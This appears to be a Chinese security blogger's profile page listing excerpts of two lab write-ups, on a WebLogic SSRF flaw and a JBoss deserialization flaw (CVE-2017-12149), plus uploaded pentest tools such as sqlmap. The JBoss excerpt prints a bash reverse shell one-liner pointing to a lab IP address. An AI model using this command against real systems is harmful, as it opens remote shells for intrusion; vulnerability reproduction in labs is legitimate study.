- 博客(2)
- 资源 (8)
- 收藏
- 关注
原创 Weblogic-SSRF漏洞复现
Weblogic-SSRF漏洞复现 记一次Weblogic-SSRF漏洞复现过程 0x01****ssrf简介 SSRF(server-side request forgery ):服务器端请求伪造。是一种由攻击者构造形成由服务器端发起请求的一个安全漏洞,一般情况下,ssrf攻击的目标是从外网无法访问的内部系统 0x02环境搭建 Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 环境如下: http://192.168.10.1
2020-08-24 17:39:09 224
原创 JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞(CVE-2017-12149) 记一次JBoss反序列化漏洞复现过程 如图,搭建一个JBoss环境 (备注:CVE-2017-12149适用JBoss版本:5.x / 6.x) 漏洞原理: 该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化 编写反弹shell命令: bash -i >& /dev/tcp/192.168.10.100/21 0>&1 由于Run
2020-08-21 14:27:39 473
最新版sqlmap1.3.4.zip
2020-06-28
文件搜索工具(FileLocator Pro)V8.2中文便携版.zip
2020-06-12
CyberChef-master.zip
2020-06-12
jython-standalone-2.7.0(最新版本)
2019-04-17
新版sqlmap
2019-04-10
火狐浏览器-渗透专版(便携)
2019-04-05
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人